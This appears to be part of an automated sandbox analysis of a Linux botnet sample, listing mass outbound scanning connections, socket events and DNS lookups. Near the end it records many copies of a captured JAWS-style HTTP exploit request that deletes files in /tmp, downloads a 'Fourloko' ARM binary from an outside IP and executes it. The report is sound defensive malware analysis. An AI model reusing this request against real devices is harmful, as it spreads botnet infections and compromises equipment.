Source: global traffic TCP traffic: 192.168.2.23:62642 -> 68.18.118.23:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 104.103.134.67:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 107.112.168.250:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 85.47.173.192:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 148.43.220.47:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 95.66.45.33:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 105.21.143.63:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 80.37.172.232:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 204.118.60.180:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 144.77.105.185:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 74.180.225.138:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 108.231.17.207:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 145.85.56.242:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 201.147.71.214:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 184.14.68.196:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 145.126.95.116:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 134.61.217.97:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 174.78.44.42:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 211.233.32.189:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 181.255.116.88:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 97.100.138.119:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 121.41.198.245:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 84.228.130.82:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 207.178.108.159:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 31.151.34.172:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 32.255.244.244:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 111.48.246.182:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 152.5.129.158:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 88.115.235.49:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 67.5.123.73:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 46.26.46.151:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 119.201.225.4:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 111.247.191.212:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 77.217.31.153:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 18.147.146.84:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 147.118.185.10:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 181.212.176.23:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 154.181.105.3:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 168.33.61.120:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 184.114.62.247:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 187.216.90.81:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 138.168.132.232:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 83.143.251.107:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 150.11.21.90:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 196.157.178.194:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 48.175.76.102:60001
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 165.186.196.221:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 154.5.140.98:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 123.49.171.251:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 46.171.131.57:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 129.101.4.63:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 113.92.31.199:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 194.89.84.55:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 48.70.186.197:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 61.84.81.125:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 60.61.184.90:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 132.113.246.172:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 44.226.150.96:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 122.191.133.54:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 24.101.93.26:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 204.195.7.251:2323
Source: global traffic TCP traffic: 192.168.2.23:62898 -> 124.197.251.240:2323
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 86.80.174.146:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 27.86.27.2:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 71.210.73.112:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 23.29.49.251:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 84.221.142.125:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 50.110.179.60:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 65.127.143.43:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 5.146.175.11:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 157.241.71.35:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 159.129.179.129:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 154.34.159.161:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 79.36.239.27:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 98.10.61.147:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 166.153.238.3:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 208.72.143.170:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 86.191.3.30:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 144.194.15.198:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 1.4.211.8:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 113.86.118.173:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 105.85.100.216:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 137.179.29.3:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 114.154.113.140:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 90.199.199.161:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 159.86.91.117:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 157.137.45.186:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 59.190.181.113:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 79.64.172.232:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 180.99.45.222:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 193.92.172.231:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 47.76.21.220:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 144.225.37.178:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 20.112.122.79:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 9.9.216.43:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 18.243.249.144:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 85.170.44.93:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 115.103.146.55:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 182.101.251.175:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 130.161.177.37:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 118.45.151.38:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 165.221.27.66:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 168.163.40.25:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 197.175.182.25:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 184.184.233.67:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 45.141.225.81:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 209.79.114.116:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 134.63.216.157:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 59.244.157.79:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 178.4.153.248:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 159.150.165.26:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 105.23.76.101:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 222.96.148.52:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 211.153.155.104:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 212.117.26.216:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 98.129.12.252:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 119.11.153.73:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 154.45.34.185:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 1.188.106.137:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 85.156.202.196:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 123.131.239.82:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 40.15.235.240:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 24.118.193.109:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 13.129.186.10:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 13.133.71.150:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 12.91.251.42:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 220.1.212.140:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 180.52.106.84:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 176.8.126.10:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 187.34.51.53:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 54.193.120.98:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 32.22.207.168:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 1.16.175.95:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 107.241.120.83:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 9.155.25.169:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 168.233.214.10:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 159.208.41.127:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 199.214.130.251:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 121.14.5.111:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 63.189.235.237:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 132.97.66.206:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 101.93.173.154:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 34.163.237.182:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 101.36.251.217:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 96.169.90.252:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 155.120.72.26:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 72.176.47.19:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 107.238.181.235:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 12.157.24.239:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 119.15.238.31:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 83.231.58.243:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 63.61.137.115:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 175.244.16.223:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 176.185.157.238:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 203.50.80.90:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 4.202.121.151:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 137.123.4.166:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 208.159.12.251:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 42.151.149.137:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 159.244.179.76:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 75.131.54.227:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 137.227.211.19:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 173.239.65.6:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 112.190.9.149:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 212.237.204.230:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 68.179.177.130:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 136.239.250.2:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 145.170.203.205:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 61.241.136.83:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 64.202.193.97:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 41.134.222.207:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 151.82.210.50:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 5.183.71.165:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 221.80.4.139:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 104.175.97.41:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 19.12.178.138:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 191.195.43.31:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 123.139.0.239:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 5.234.122.60:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 205.94.91.200:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 159.133.160.47:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 38.123.11.0:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 99.194.198.208:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 157.87.90.62:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 162.245.117.118:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 211.4.157.42:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 78.17.173.61:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 132.242.81.67:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 112.182.128.36:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 183.249.7.148:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 197.129.111.242:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 170.150.237.230:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 38.138.83.58:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 177.137.188.201:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 73.125.135.182:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 135.125.156.70:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 105.116.140.255:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 116.133.132.53:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 66.154.66.53:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 109.251.107.243:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 53.204.240.5:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 44.206.70.74:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 112.108.232.208:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 89.53.240.190:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 178.242.135.37:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 117.117.40.17:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 186.155.22.191:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 65.1.190.204:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 142.207.201.195:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 35.186.242.198:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 66.200.140.83:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 193.250.210.255:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 138.170.227.30:60001
Source: global traffic TCP traffic: 192.168.2.23:62642 -> 141.80.171.175:60001
Sample listens on a socket
Source: /lib/systemd/systemd-journald (PID: 5308) Socket: <unknown socket type>:unknown Jump to behavior
Source: /usr/sbin/gdm3 (PID: 5502) Socket: <unknown socket type>:unknown Jump to behavior
Source: /usr/bin/dbus-daemon (PID: 5531) Socket: <unknown socket type>:unknown Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5571) Socket: <unknown socket type>:unknown Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5675) Socket: <unknown socket type>:unknown Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5772) Socket: <unknown socket type>:unknown
Source: /usr/sbin/gdm3 (PID: 5773) Socket: <unknown socket type>:unknown
Source: /lib/systemd/systemd (PID: 5794) Socket: <unknown socket type>:unknown
Source: /lib/systemd/systemd-journald (PID: 5900) Socket: <unknown socket type>:unknown
Source: /lib/systemd/systemd-journald (PID: 6004) Socket: <unknown socket type>:unknown
Source: /usr/sbin/gdm3 (PID: 6006) Socket: <unknown socket type>:unknown
Source: unknown Network traffic detected: HTTP traffic on port 35692 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35694 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35688 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36462
Source: unknown Network traffic detected: HTTP traffic on port 35690 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35688
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35694
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35692
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35690
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36462 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 42.235.62.146
Source: unknown TCP traffic detected without corresponding DNS query: 24.132.216.36
Source: unknown TCP traffic detected without corresponding DNS query: 165.46.148.41
Source: unknown TCP traffic detected without corresponding DNS query: 101.212.218.38
Source: unknown TCP traffic detected without corresponding DNS query: 196.168.81.36
Source: unknown TCP traffic detected without corresponding DNS query: 169.1.238.24
Source: unknown TCP traffic detected without corresponding DNS query: 20.250.201.41
Source: unknown TCP traffic detected without corresponding DNS query: 157.29.219.252
Source: unknown TCP traffic detected without corresponding DNS query: 202.87.60.165
Source: unknown TCP traffic detected without corresponding DNS query: 63.95.13.159
Source: unknown TCP traffic detected without corresponding DNS query: 167.80.156.118
Source: unknown TCP traffic detected without corresponding DNS query: 202.118.167.19
Source: unknown TCP traffic detected without corresponding DNS query: 217.0.244.101
Source: unknown TCP traffic detected without corresponding DNS query: 211.56.173.66
Source: unknown TCP traffic detected without corresponding DNS query: 211.174.85.183
Source: unknown TCP traffic detected without corresponding DNS query: 86.88.131.23
Source: unknown TCP traffic detected without corresponding DNS query: 165.97.105.164
Source: unknown TCP traffic detected without corresponding DNS query: 208.231.150.91
Source: unknown TCP traffic detected without corresponding DNS query: 54.70.177.31
Source: unknown TCP traffic detected without corresponding DNS query: 159.94.253.163
Source: unknown TCP traffic detected without corresponding DNS query: 73.57.74.130
Source: unknown TCP traffic detected without corresponding DNS query: 84.199.170.119
Source: unknown TCP traffic detected without corresponding DNS query: 99.214.255.211
Source: unknown TCP traffic detected without corresponding DNS query: 99.181.191.227
Source: unknown TCP traffic detected without corresponding DNS query: 209.195.25.100
Source: unknown TCP traffic detected without corresponding DNS query: 114.228.180.90
Source: unknown TCP traffic detected without corresponding DNS query: 111.71.47.153
Source: unknown TCP traffic detected without corresponding DNS query: 152.117.191.72
Source: unknown TCP traffic detected without corresponding DNS query: 223.214.7.227
Source: unknown TCP traffic detected without corresponding DNS query: 152.218.88.234
Source: unknown TCP traffic detected without corresponding DNS query: 150.251.189.209
Source: unknown TCP traffic detected without corresponding DNS query: 93.98.117.66
Source: unknown TCP traffic detected without corresponding DNS query: 196.152.17.96
Source: unknown TCP traffic detected without corresponding DNS query: 81.55.204.244
Source: unknown TCP traffic detected without corresponding DNS query: 54.157.98.241
Source: unknown TCP traffic detected without corresponding DNS query: 20.244.188.141
Source: unknown TCP traffic detected without corresponding DNS query: 1.162.166.198
Source: unknown TCP traffic detected without corresponding DNS query: 170.254.96.95
Source: unknown TCP traffic detected without corresponding DNS query: 137.129.244.17
Source: unknown TCP traffic detected without corresponding DNS query: 126.115.224.73
Source: unknown TCP traffic detected without corresponding DNS query: 138.42.77.248
Source: unknown TCP traffic detected without corresponding DNS query: 160.131.17.133
Source: unknown TCP traffic detected without corresponding DNS query: 189.163.109.36
Source: unknown TCP traffic detected without corresponding DNS query: 102.93.154.32
Source: unknown TCP traffic detected without corresponding DNS query: 207.145.115.10
Source: unknown TCP traffic detected without corresponding DNS query: 104.120.150.99
Source: unknown TCP traffic detected without corresponding DNS query: 42.185.73.124
Source: unknown TCP traffic detected without corresponding DNS query: 46.181.28.79
Source: unknown TCP traffic detected without corresponding DNS query: 114.50.21.187
Source: unknown TCP traffic detected without corresponding DNS query: 41.37.189.210
Source: VAkpLB9NSD String found in binary or memory: http://upx.sf.net
Source: syslog.354.dr, syslog.300.dr, syslog.71.dr, syslog.196.dr, syslog.234.dr String found in binary or memory: https://www.rsyslog.com
Source: unknown DNS traffic detected: queries for: daisy.ubuntu.com
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
